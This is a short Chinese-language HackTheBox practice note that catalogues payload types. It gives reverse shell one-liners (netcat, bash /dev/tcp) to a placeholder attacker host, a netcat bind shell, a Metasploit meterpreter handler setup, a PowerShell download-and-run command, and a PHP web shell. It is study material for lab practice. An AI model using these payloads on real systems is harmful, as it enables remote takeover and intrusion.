HTB練習紀錄 — Headless

• Payload

[番外02]詳細說明了Payload的存在意義，本章來探討有哪些Payload的種類

Payload的主要類型

1. Reverse Shell Payload

• 功能：使目標系統主動連接到攻擊者的系統，提供一個命令行界面供攻擊者控制。
• 示例：

Netcat：

nc <attacker_ip> <port> -e /bin/bash

Bash：

bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1

2. Bind Shell Payload

• 功能：在目標系統上打開一個端口，攻擊者可以連接到該端口來獲取系統控制權。
• 示例：

Netcat：

nc -lvp <port> -e /bin/bash

3. Meterpreter Payload

• 功能：由 Metasploit Framework 提供，提供強大的交互式會話，支持文件傳輸、截屏、密碼收集等功能。
• 示例：

Metasploit：

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <port>
exploit

4. Command Execution Payload

• 功能：在目標系統上執行指定的命令，通常用於執行攻擊者的命令或腳本。
• 示例：

Windows：

powershell -Command "Invoke-WebRequest -Uri http://<attacker_ip>/payload.ps1 -OutFile C:\Windows\Temp\payload.ps1; Start-Process powershell -ArgumentList '-ExecutionPolicy Bypass -File C:\Windows\Temp\payload.ps1'"

5. Exploit Payload

• 功能：利用漏洞來執行攻擊代碼，這可能涉及利用應用程序或系統中的漏洞來執行 Payload。
• 示例：

Web 應用漏洞：
使用 http://target.com/vuln.php?cmd=whoami 來執行命令。

php
<?php system($_GET['cmd']); ?>